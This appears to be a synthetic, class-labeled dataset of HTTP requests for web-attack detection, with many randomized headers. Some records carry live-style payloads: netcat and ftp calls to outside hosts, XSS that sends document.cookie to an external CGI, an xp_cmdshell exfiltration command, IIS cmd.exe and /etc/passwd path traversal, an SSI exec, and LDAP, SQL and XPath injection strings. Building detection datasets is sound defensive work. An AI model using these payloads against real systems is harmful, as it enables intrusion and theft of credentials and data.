Date: Wed, 31 Mar 04 04:25:59 CET
ETag: W/"rUzInsOwOf8G0X7o-"
Expect: pmtehnge
From: otnE6rt@cbsnLanere.cz
If-Modified-Since: Wed, 30 Nov 05 21:39:18 UTC
If-Unmodified-Since: Sun, 02 May 10 03:40:52 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Jul 04 20:23:54 CET
Max-Forwards: 353
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM dWJzaGxuZXR5c3Nsbm5kdXJ6MHJkcjdhUmFkaGFqdGhpbnZobnNl
Authorization: o6hk nUnoo9=kdsnx
Range: 708062-
Referer: /erh20e/Frnpca/eotnlnO/o9tdo1au.pdf
TE: trailers
Trailer: If-Range
User-Agent: et95aakncoteysnl
UA-CPU: StrongARM
UA-Disp: 427,646,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 334x4748
Via: 0.4 www.uejfxj6.png, 4.2 www.aptodf.gif, 8.4 www.tozmn.css
Transfer-Encoding: gzip
Upgrade: shoq/5.8, ecn/2.0, sha/2.4
Warning: 573 www.w0le3ue.js:98108 "oaMintne07soeaotcrtl" 
X-Forwarded-For: 151.48.131.243
X-Serial-Number: 37054990
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49402
Start - Id: 43245
class: OsCommanding
GET /4j1m3Ijk3/xnph-0e7BWbgsoundYRUZ/ph/q_KwQKndTIvWZa-lRqx/mhoheanv6/varsteE.aspx?saoud=tz9FL&dkxi8eN=%250a+++nc+++www.vetens.com+++++80+%3B&r51shuojisaih=273 HTTP/1.0
Host: 158.107.87.103
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, gzip, identity, compress;q=0.6
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 92.41.242.45
Cookie: hivd=owRM;htnM=4126117853
Cookie2: $Version="8"
Date: Tue, 09 Mar 04 01:21:10 CET
ETag: W/"A1snvtSIhN@QT-p@wgqg"
Expect: h6244tu
From: w5itei@2re1ofAi.st
If-Modified-Since: Wed, 19 Jan 05 06:26:36 CET
If-Unmodified-Since: Sun, 13 May 07 19:29:37 UTC
If-Match: *
If-None-Match: "KNpOLxGzqwDX@7YWDblS"
If-Range: Tue, 22 Jul 08 12:31:47 UTC
Max-Forwards: 04
MIME-Version: 6.4
Pragma: E='teo'
Proxy-Authorization: Digest realm
Authorization: Basic SnRiYTdjMHI6MmRnYWN0
Range: 6235-,3-
Referer: /8nsau/a1aO.php3
TE: trailers,chunked;q=0.6,trailers
Trailer: If-None-Match
User-Agent: Mozilla/5.2 (X11; U; Open BSD i586 9.3; ml-Il; rv:1.2.4) Gecko/27097160
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: FTP/6.0 225.25.182.234
Transfer-Encoding: OuaE; cplrc0sl=fdohc
Upgrade: nedg/4.6, yodj/9.6
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 136.143.222.59
X-Serial-Number: 855673274232810386
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43245
Start - Id: 37792
class: LdapInjection
GET /0ZB2AyMYr7m0tjE/e16qk0KctlUG/vc.png?yrttipaOynhoren=r.-&yetslwiede46d=%29++++%28+%7C++++%28displayName%3Dhad*%29++%28name+++%3D+++had*+++%29%28+++mail%3Dhad*++++%29&izeilt9Nxgiw=sftwtaunionmH&et=cipaFoii4ruf41nnrt HTTP/1.1
Host: 234.16.52.225:2
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-stale=37
Client-ip: 3.185.76.253
Cookie: jekqf-cIt2VQ=a$s;tRl=ny7Nd
Cookie2: $Version="816"
Date: Fri, 06 Jan 06 12:46:17 UTC
ETag: W/"v4Jd_fMeChEj0Ulgn"
Expect: h2tit=i1adelef
From: uh7w@ednaarot.de
If-Modified-Since: Tue, 23 Mar 04 21:08:00 UTC
If-Unmodified-Since: Sat, 03 Feb 07 18:05:31 UTC
If-Match: "f3x@0zpY1dEO4wSNMEhf"
If-None-Match: "xP.2rvy@Kyq-1nFiQacF"
If-Range: *
Max-Forwards: 0
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: 5rOgw olket=bU2elthe
Authorization: Digest realm
Range: 985797-045,63371-
Referer: /uiteald/xxQt/7aatse/eefE.mdb
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/2.8 (X11; U; Linux i586 7.8; ej-hn; rv:8.5.9) Gecko/65486429
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 807x162
Via: 9.5 12.189.233.108:313
Transfer-Encoding: identity
Upgrade: 1wi/0.9, ue5/8.1, uoi/7.4
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 313321
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37792
Start - Id: 41573
class: SqlInjection
GET /QVRG-rz1/oa/gelgdteeijin/qoLxC.asmx?nodlqi=c8Tq&n8ga4seb=saimK4+bsy&4tss=hgkXC&roqatv1Er4ns=8246065&Ceore2lowo=lahn+&M6ohra=%25zUa&waaEervsxaa2grt=winntSoW+agnetcata1ixDahs1fy%2F&enta1db=439856&tr9OaL7=9teousm8tn%3Fow+ikmI&PCdrop_Gbz1BI_=%27++OR++%272t3Nmn%27+++++BETWEEN+++++%27R%27++++AND+++++%27T&in=6833&li=25890071 HTTP/1.0
Host: www.ouraflEiiZ.it:80
Connection: y5oneet
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=94
Client-ip: 237.68.176.239
Cookie: tihtncwetet=746;hecjm2ttaeSe=06t;ysoagr=ca+U emevalt;Jtao= &;LZBX1i.VRC=iOiassh;TUOVsXDRb=]aasbkntomfrom9fnsyosk
Cookie2: $Version="950"
Date: Wed, 16 Jun 04 07:42:15 CET
ETag: "Mjovsj8NklqegQiwJGfc"
Expect: lelwnt
From: xwfji@6eera.be
If-Modified-Since: Sat, 30 Aug 08 10:49:26 UTC
If-Unmodified-Since: Wed, 13 Dec 06 22:51:25 GMT
If-Match: "89qyYq7ag@mcdLk9Mw"
If-None-Match: "hWceBVZBcyHem7PY4"
If-Range: Wed, 09 Apr 08 01:36:02 GMT
Max-Forwards: 98
MIME-Version: 7.8
Pragma: 1fcgiy='riss'
Proxy-Authorization: NTLM b2xzb3NobDl0dG9mbWpvZTJmc2VmczJlZWhlZm10cWV0aHN1bGNvNmliZDg=
Authorization: ytkd2f r9ns9e=yODl
Range: 629953-,-3
Referer: /0etnnil7.jsp
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/0.3 (compatible; Oftmhlelai; Linux i586; tNenicdUe; Nlfhel)
UA-CPU: StrongARM
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1852x515
Via: HTTP/2.9 www.uwip.gif, 3.0 169.72.154.142:51532, 0.2 42.201.7.214:312
Transfer-Encoding: gzip
Upgrade: Epoll/4.7, sesde/6.4, Uar/2.7, i4she/5.4, mukl/7.2
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 27867012215439
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41573
Start - Id: 46799
class: XSS
POST /eymVP/jabntai/Tiul2sDe/0dpasswdIa1zhAQj.gif? HTTP/1.0
Content-Length: 316
Content-Language: aeast,8eyeo
Content-Encoding: gzip
Content-Location: /ifin/Axchsa.exe
Content-MD5: ZWFyeXJwZXJpcTF0aXlwYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 Mar 07 17:55:29 GMT
Last-Modified: Tue, 26 Sep 06 16:04:47 GMT
Host: www.petnnada.biz
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: gzip;q=0.3, identity, compress;q=0.7, gzip
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 163.182.220.152
Cookie: titod=sx5
Cookie2: $Version="55"
Date: Sun, 16 Sep 07 07:39:57 UTC
ETag: "zdWaUN_28hOSe2q66Mv"
Expect: o6sRe3
From: rrxr@antg6tman.st
If-Modified-Since: Tue, 18 Apr 06 05:46:20 UTC
If-Unmodified-Since: Tue, 14 Nov 06 16:51:08 GMT
If-Match: "-4Cuhv6Ak_mEckNiK"
If-None-Match: *
If-Range: "icS7uH.4ofWdvcIWE"
Max-Forwards: 636
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Basic RDBlQWk6ZWloNg==
Authorization: eDhssr csdna=RCxgOnuo
Range: 15-86
Referer: /SDtH7heh/oLLyji.jsp
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: hoirf (mF4O1A29; uJF7K8VEt; bMkc61wl)
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 818x5674
Via: 2.5 64.74.41.231, FTP/3.7 www.erecoa.htm, coli/5.6 185.118.118.60
Transfer-Encoding: uyqu; rjvr=yed1
Upgrade: 5dpmt/2.8, kAt/9.2, PrmjAp/1.4, moi/3.4
Warning: 628 www.gpeent.gif "bdfniiksnrsxp" 
X-Forwarded-For: 90.168.251.169
X-Serial-Number: 80684101
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

b7PbTvcmd9L1=<img  dynsrc =    "  javascript:[document.location.replace  ('http://www.as.com/cgi-bin/aretgeal.cgi'+document.cookie);] ">&T48aqh=u&qHTP5EoimgSE=01230216&boRgd=tQ8CxpGWO&Tcvijehmsta4yr=399817&otBTPDG0node=NilhnmtlTfeo7z&WrlRT=tdl2&sePj4it5n2tHo=t1i&fLYEzsKbxWj=nmr

End - Id: 46799
Start - Id: 36847
class: OsCommanding
POST /tncemaxiiv6iTs/aIeuT/ee6M2weshinlitt/0tD.HhpQKWdD_f/alHLARtHaD1A.aspx? HTTP/1.1
Content-Length: 38
Content-Language: ecnsAswe,1nu2oa,iame4
Content-Encoding: gzip
Content-Location: http://0snhaMte.ch/1tinb/atbdcR/bhag/xteolDc.php
Content-MD5: ZGhvbmVpTjk3b2l4YzBzdg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Jun 06 06:26:32 UTC
Last-Modified: Mon, 21 Jul 08 23:46:59 CET
Host: www.rcttOwST8m.biz:80
Connection: close
Accept: image/png
Accept-Charset: big5, iso-8859-6;q=0.4, iso-8859-3;q=0.4, iso-2022-jp;q=0.2, koi8;q=0.7
Accept-Encoding: 
Accept-Language: a3drx-abi;q=0.2, lwNtG7Na-eiihoG;q=0.5, ivb2n2-6e
Cache-Control: min-fresh=26355
Client-ip: 204.154.215.56
Cookie: ms=77978;ccaJs=2120053357;DKFO_Sm.betweenX-=bhisN;pcjxrskttm0tEos=\nuftp  -p   www.dematoto.com  /ntsi/llelrive/ente/trinch/rill/li;Cie4m3=8ynleaBre;tme=hDAtfnhoopm
Cookie2: $Version="725"
Date: Fri, 30 Sep 05 21:22:17 CET
Expect: 100-continue
If-Modified-Since: Sat, 27 Nov 04 20:59:19 GMT
If-Unmodified-Since: Thu, 18 May 06 09:18:49 UTC
If-Match: "Wes2BXP015c5JP@EZ14D"
If-None-Match: *
If-Range: Thu, 16 Apr 09 15:14:55 GMT
Max-Forwards: 7
MIME-Version: 8.3
Pragma: siaR='egpn6t'
Authorization: NTLM Mm9lU2EzdG1lOHJjd2VtdWxscGl0ZWFoRGRlb3RhNjBlbVBvZXRhYU5pYWg=
Referer: /uecpu.swf
Trailer: Transfer-Encoding
User-Agent: aintwhd (w8aalAC; x_@1Ni; g64ec4vyz8; hK7K9eln4m; uuEsUPc.b)
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 2394x0412
Via: FTP/2.6 www.Gttclrb.html
Transfer-Encoding: identity
Warning: 418 105.218.208.87 "tuustOtrjn" 

geatoe8a1ti4=snW8dG&oleu=Le&f4a=n1aaeL

End - Id: 36847
Start - Id: 47546
class: XSS
GET /At9EK1V_andE5/0aLlt4HfhitYtlcgro/3evtosIhcx/eiPdD2jQLAKt@LoBXZO/dTK5iM1mJaTjiJsb/edgts1t.cgi?usSui=%3Ca++href%3D%22+++javas%26%2399%3Bript%26%2335%3B%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.niie.com%2Fcgi-bin%2Fngtralie.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22++%3E&nyerbec=rRirDedin HTTP/1.1
Host: www.Cnipkttx.ch
Connection: close
Accept: audio/*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 124.42.14.246
Cookie: r1vb=dMx@0jzgk;7dn09en=zi2fo;ieYisek4=433676;ssyEntzp4r=qpMtfgUvhxz;n9eT0e=prHLat5wtrhUDg;etii=cmT5aii4jeg0o
Cookie2: $Version="8"
Date: Sun, 14 Jan 07 07:42:53 UTC
ETag: ".hOL6y3DPe6aw9Q5di1"
Expect: ynh8
From: sevLsg9@hooNmu.fr
If-Modified-Since: Mon, 21 Sep 09 24:29:51 CET
If-Unmodified-Since: Thu, 19 Jul 07 11:31:06 CET
If-Match: *
If-None-Match: "nlPvheeUYn6NMvD."
If-Range: Sun, 21 Sep 08 21:52:12 UTC
Max-Forwards: 204
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM ZGllbGlpb2plYXJlZXRkZW45dHV4ZWVvdWl0NmFhNkdnVWlob3hyc091bmxleGF6
Range: 35190-213,56187-
Referer: http://1voi3tsb.org/bunbto/roUiti/rMncocdu/eejirna/pmnsai1i.wav
TE: gzip;q=0.8,trailers
Trailer: If-None-Match
User-Agent: Mozilla/7.3 (Machintosh; U; PPC Mac OS X 9.6; 9o-9t; rv:1.5.2) Gecko/20001849
UA-CPU: PowerPC
UA-Disp: 050,2452,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2187x3503
Via: 2so/5.0 www.tgclwwi.shtml:0467, 5.9 www.en3itoAe.tiff
Transfer-Encoding: rqbcIi; ntkntoee=ioid
Upgrade: v8h/0.4
Warning: 992 www.4eiian.js "meeteeolpwgufO" "Tue, 02 Mar 10 02:39:00 CET"
X-Forwarded-For: 112.231.125.157
X-Serial-Number: 57604389
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47546
Start - Id: 35870
class: XPathInjection
GET /Ee/aeR98GfFQtelnet/5J0djoYYlnodewservices.html?Ros=Onny7eeoeey&sineaa=mdX2s6ovJ&H3fhz=2&hd1hee=oYbOs&a9G=1836370&o8h=rnrrtsojjhst&htosvc=sinozwe77depe5hEt&ghbcdned=fjsoEt%2Fotn%2Ft%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D699%5D+++++or++++%27hl6ixuyh%27+++%3D+%27&aourdea=%24bbxnlatowp-6c2a&MKOl8NYahuqU=menoax9ladeCciw HTTP/1.0
Host: 54.51.247.117
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: hz-gb-2312, utf-8
Accept-Encoding: *;q=0.4
Accept-Language: ssioi-cmHan, Z-ern, mi-qosme4ef;q=0.7, ni7pu-0, ae9cin-aoutr
Cache-Control: only-if-cached
Client-ip: 118.230.75.151
Cookie: hrrfizdso=thshutdownze rSsm;aie5=6etnie;f6cnNeatlSt=4337;iroErrn9Lem=httpt;xsfEn4leh=i509_FaN44H
Date: Tue, 30 Sep 08 09:10:57 CET
ETag: "j6_RBDMJQV7b5lSDIfdF"
Expect: 100-continue
From: Fpheel@eire9igs.org
If-Modified-Since: Sat, 08 Nov 08 10:41:54 UTC
If-Unmodified-Since: Wed, 11 Jun 08 16:18:05 UTC
If-Match: "zO28Bxnflb@XmKy2m"
If-None-Match: *
If-Range: "Noeyz5mbv0O_Xl_"
Max-Forwards: 8
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: dcxnx vuow=u1e0
Range: 440415-33194,1644-5
Referer: /oR6qoiz.tiff
Trailer: Expect
User-Agent: ffmmQbqr http://www.yulnbcov.uk
Via: 3.2 20.147.36.45, osrg/8.2 www.ts3eei58.html
Warning: 341 www.ei3igla.htm:804 "dheeeoo9Tztn" 
X-Serial-Number: 160475

null

End - Id: 35870
Start - Id: 46264
class: PathTransversal
GET /5BsAox/sd3evi/aux/fDNaccess_logQh@Iflnetcat/Psaifspitov3/bTia.cfm?6l=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&q6K97O=181305&abt=yhlxelcsur HTTP/1.0
Host: 133.162.91.6
Connection: close
Accept: text/*, application/*;q=0.1
Accept-Charset: iso-8859-1;q=0.3
Accept-Encoding: 
Accept-Language: rtaAa-nvcece;q=0.2, Wlnrt-nyuf9, 7-r;q=0.3
Cache-Control: no-cache
Client-ip: 117.131.231.99
Cookie: fhF3ZTjs=hia
Cookie2: $Version="45"
Date: Thu, 18 Jun 09 08:36:29 CET
ETag: "VNc9YS_adiG6@ph7"
Expect: 100-continue
From: o8nret@EbsFqo4s.st
If-Modified-Since: Sat, 18 Jul 09 09:43:05 CET
If-Unmodified-Since: Sat, 12 Feb 05 22:45:52 CET
If-Match: "OQJAU4WpPPnXu@r"
If-None-Match: "KfGa4I33X5fXQmtG"
If-Range: *
Max-Forwards: 4
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM eXJRM2xlZHJodDRlMmtnN3dyYWV0ZWd1YWVxaWFFdmcxZWVlb2xpc2Fv
Authorization: Digest qop=ctrsh
Range: 723-2
Referer: http://www.amcstcel.st/sha19T/btuteuSa/utyu.tar.gz
TE: gzip,trailers,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/8.7 (Machintosh; U; PPC Mac OS X 3.2; dA-dR; rv:8.2.6) Gecko/50189695
UA-CPU: 68000
UA-Disp: 5467,9007,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5939x660
Via: 9.4 www.Iqtes.jpg:12
Transfer-Encoding: gzip
Upgrade: roeie/1.4
Warning: 687 www.ndt99mt.png:13587 "extsrsgust" "Thu, 14 Feb 08 08:06:55 UTC"
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 1060683
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46264
Start - Id: 38130
class: LdapInjection
GET /qzcXseU/prl2htArrn.exe?Z6=hspQk%29%28%26%28objectClass%3Datnt*%29&maEshfdbusac7pu=61899 HTTP/1.0
Host: 72.8.231.232
Connection: trrv
Accept: application/postscript, video/mpeg;q=0.2
Accept-Charset: iso-8859-2;q=0.1, koi8, iso-8859-1, x-mac-roman;q=0.7
Accept-Encoding: *;q=0.6
Accept-Language: ahOryweo-rzrhet;q=0.4, Eds8oe5g-iioothi;q=0.3, nieyai5-lnee;q=0.4
Cache-Control: no-cache
Client-ip: 117.134.138.91
Cookie: e6ei=bhtpass;hwdeecmieyoxR=[fe-euaah\lkstdins'tt n;ghsdfhqdd=linkyv;ueoreary=8;k-DR0W-=uasystem-( lh2mfecj;aylfielfsu=having84
Cookie2: $Version="5"
Date: Wed, 26 Dec 07 18:44:23 CET
ETag: W/"ON_i5LQVwfZXmyfN"
Expect: 100-continue
From: ttste@rra4euq0.de
If-Modified-Since: Fri, 10 Nov 06 16:36:29 UTC
If-Unmodified-Since: Sat, 02 Feb 08 18:09:18 UTC
If-Match: "O@KraQ34@7QxRmFDaSi"
If-None-Match: "fzS1T2Fqy8lTDSXiaj@"
If-Range: Wed, 17 Aug 05 14:09:18 CET
Max-Forwards: 62
MIME-Version: 0.5
Pragma: ub8rreh=swt8a
Proxy-Authorization: sz68gt ghfnil=auo57ahx
Authorization: Digest algorithm=MD5
Range: 17768-5
Referer: http://www.erpotoh.be/gnar/debrMt3.php
TE: trailers,trailers,gzip;q=0.3
Trailer: From
User-Agent: gtmoeoefe
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 9991x6291
Via: FTP/0.3 46.37.149.19
Transfer-Encoding: compress
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 380 www.gtcrerT.html:4591 "ksmndhegEt2od" "Sat, 04 Oct 08 01:21:24 GMT"
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38130
Start - Id: 39992
class: SSI
GET /XcsMdoatsoioteeg.nsf?K9httpsHId9Dscript=%3C%21++++%23%3C%21--%23exec++++cmd%3D%22id%22--%3E HTTP/1.0
Host: 58.4.27.73
Connection: close
Accept: image/png, application/*;q=0.8
Accept-Charset: cp-932;q=0.7, cp-932, big5;q=0.2, iso-8859-4;q=0.0, windows-1254;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=9672
Client-ip: 0.179.99.133
Cookie: docsurmmgo6a=seWA1MpM2A;aqceitnnta=waey
Cookie2: $Version="4"
Date: Mon, 15 Mar 04 16:27:37 GMT
ETag: W/"snzYcROZfCdT0_HXP"
Expect: 100-continue
From: jr71br@ogyeeokrac.biz
If-Modified-Since: Thu, 21 Jul 05 06:20:02 CET
If-Unmodified-Since: Thu, 08 Apr 10 22:18:27 UTC
If-Match: "5ATC9_blYrj3waAP5o0"
If-None-Match: "9a-dDsrLxzgaIaW2"
If-Range: Sun, 07 Feb 10 08:26:13 CET
Max-Forwards: 683
MIME-Version: 3.3
Pragma: r9Ctaee='a9maidhn'
Proxy-Authorization: NTLM NlQ2YWhtdWl0dGR2TGxlem9OZW50dG9vaXI5VTVicmlzc2xnbm9rZW9sdGVuZWU=
Authorization: Digest response="5dc4135A5DF33d19fFc37CdbA06B50E0"
Range: 618-573,4-,461-
Referer: /Qrbno/ea2i/tvxzssil/hmoOxwt.php3
TE: deflate;q=0.6,deflate,gzip
Trailer: TE
User-Agent: eiRTdapd1uifn2eeh
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 860x1351
Via: 0.7 www.7yywai.js, acRts/9.7 98.22.82.136
Transfer-Encoding: deflate
Upgrade: sdsn/9.0, uilud/8.5, 5iaeew/4.1, TeH/9.8
Warning: 144 202.212.126.14 "EZtzaaiitexz9rs" 
X-Serial-Number: 18116
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39992
Start - Id: 44365
class: OsCommanding
GET /scripts/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 55.197.18.81:271
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: identity, compress, gzip;q=0.4, compress;q=0.8, identity
Accept-Language: *;q=0.1
Cache-Control: max-stale=20619
Client-ip: 85.70.71.191
Cookie: aetisws4sriA=sjee vd8~m7;Nieth=n9mailrt;eW=xohrrhir;depoearnAwd9ii=cynsbgsound
Cookie2: $Version="4"
Date: Mon, 11 Jul 05 03:08:31 GMT
ETag: "0sJ3U838L7y6r98kvw"
Expect: p4ymocrd
From: ks7mao@6esnaehk.it
If-Modified-Since: Thu, 05 Nov 09 01:53:09 UTC
If-Unmodified-Since: Fri, 09 Nov 07 02:11:29 UTC
If-Match: *
If-None-Match: *
If-Range: "usvv7nHn.nQv.BAuoaKB"
Max-Forwards: 49
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: iHauOk iIeethi7=3ndhh
Authorization: Digest response="750EEeFddf3CD4eDAAABC5d54CeAD4BE"
Range: -126597,56874-704
Referer: /bnit8.mp3
TE: gzip;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/3.7 (X11; U; Linux i586 4.1; me-ii; rv:4.4.6) Gecko/88387242
UA-CPU: x86
UA-Disp: 116,364,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 673x399
Via: 3.3 www.tmnw.png
Transfer-Encoding: Gcei
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 94309776768789
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44365
Start - Id: 49310
class: XPathInjection
GET /rJG/twtds/pF/8GSNul.2gJamq/gogut7nzotbed/ootadiitsRz2ji/dght7tednonso/9Khrrnb/bi0xml.tiff?wy=her%27+++or++opg9%2FLieu%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D8%5D++or+++%27tWOkieh%27%3D++%27&grpod8aeg5s=A&tgw3eet=sut3&5Tp=KnweneCslinktt&swchii=thwEDa&6eua=42925&rTaove3rcoplt=r+bLj0po9sboot.ini0%29 HTTP/1.1
Host: 216.128.15.193:4
Connection: keep-alive
Accept: */*
Accept-Charset: cp-932;q=0.1, iso-8859-4;q=0.7, iso-8859-8-i;q=0.6, x-mac-arabic, windows-1255;q=0.3
Accept-Encoding: deflate;q=0.6
Accept-Language: lC0e-ue
Cache-Control: atbbspi='eh0'
Client-ip: 61.235.183.55
Cookie: lnu=rKG;ro4=genenoiudnshyma;Qnph-So=01 seZoeval21;wUi1eynli=422;.aKwmVmOQWhC=7ro;r2G5T3kxp_locationAqC=os8KsRtusoY
Cookie2: $Version="01"
Date: Fri, 04 Nov 05 21:02:44 UTC
ETag: W/"5oOwunHRVio4Nk9"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Wed, 22 Jun 05 21:26:43 CET
If-Unmodified-Since: Sat, 28 Mar 09 06:34:40 CET
If-Match: "BWbgw41M@d1TKoR"
If-None-Match: *
If-Range: Wed, 06 Feb 08 19:08:55 GMT
Max-Forwards: 6
MIME-Version: 9.1
Pragma: lwr='lh'
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: Basic ZVNFSlU6MDR0bGNl
Range: 28823-,87212-
Referer: /tettEoo2.swf
TE: chunked,trailers,chunked
Trailer: Upgrade
User-Agent: Mozilla/4.8 (Windows; U; Win98 7.2; bg-ia; rv:3.2.1) Gecko/71489719
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 016x6303
Via: 8.7 www.R8ag.htm
Transfer-Encoding: nnfi
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 623 193.252.199.121 "khrNsixEqbqewainsMhL" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 8829334144305
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49310
Start - Id: 36409
class: OsCommanding
GET /ezU5.ZhGbdTM./oX@panM5SeOX/elSm/rdedamdof/mfu/aSRju/rwnrn4oaei7ikttra3s.html?anaovstrgTne=r4MUWCMXAM&4e3CtC7G.a=ooueeh758hn&eht8okectirs=7470&dntq9aoLtkei=my8a+yhhlink+pemocha%3Cn&lentmosinst5=dB%27mousMitecqoE&selectinH@yusrP_b=exec++++xp_cmdshell+%27bcp++%22select+*+from+++daujQws%22++queryout+++++pwdump.exe+++++-c++++-Craw+-Shackersip++-Usa+++-Ph8ck3r%27&rnv0adrn6n6rael=%40yshavinggs-&ntfr=E72t&eDIRpt=413470161&yoneceAi=sock_streamO+rmr6rfpositiontpwe&ausP=69653&aeen0ddxPrchl=49 HTTP/1.1
Host: www.lseco0Eye.net
Connection: keep-alive
Accept: application/*, video/mpeg, image/png
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, deflate;q=0.9
Accept-Language: *
Cache-Control: max-stale=2207
Client-ip: 90.203.150.133
Cookie: aytxsru=sNx;s8T=Kmr;o2sEeat0j=lPo;wJ= bxk;mL7oljdlU=metad5H ;UliSeL=seXote
Date: Fri, 29 Jan 10 23:06:51 CET
ETag: "hOr.gXCisBKC7v6cJQ"
Expect: inevn=aaeslabc;7ni0
If-Modified-Since: Wed, 15 Nov 06 18:12:26 GMT
If-Unmodified-Since: Wed, 23 Nov 05 13:00:50 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 13 May 07 24:50:40 GMT
Max-Forwards: 0
Proxy-Authorization: NTLM bmlvMHVsbHB0bGNvbGF0aW5XYmphZW5MYXNvdGlvRXJBaGd3NGVmZ20=
Referer: http://ye1ehk3n.org/ntab.jsp
TE: deflate,gzip;q=0.0,deflate;q=0.8
Trailer: Expect
User-Agent: e1FZsFtezB http://www.hsm2i0.fr
UA-CPU: PowerPC
Via: LYb4ae/0.7 73.2.170.101, HTTP/4.2 49.95.165.25
Transfer-Encoding: compress
Warning: 271 125.50.84.12 "ieans4Sb3nfr1aNeeTba" "Fri, 16 Dec 05 02:23:13 UTC"
X-Serial-Number: 3132284615
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36409
Start - Id: 49507
class: XPathInjection
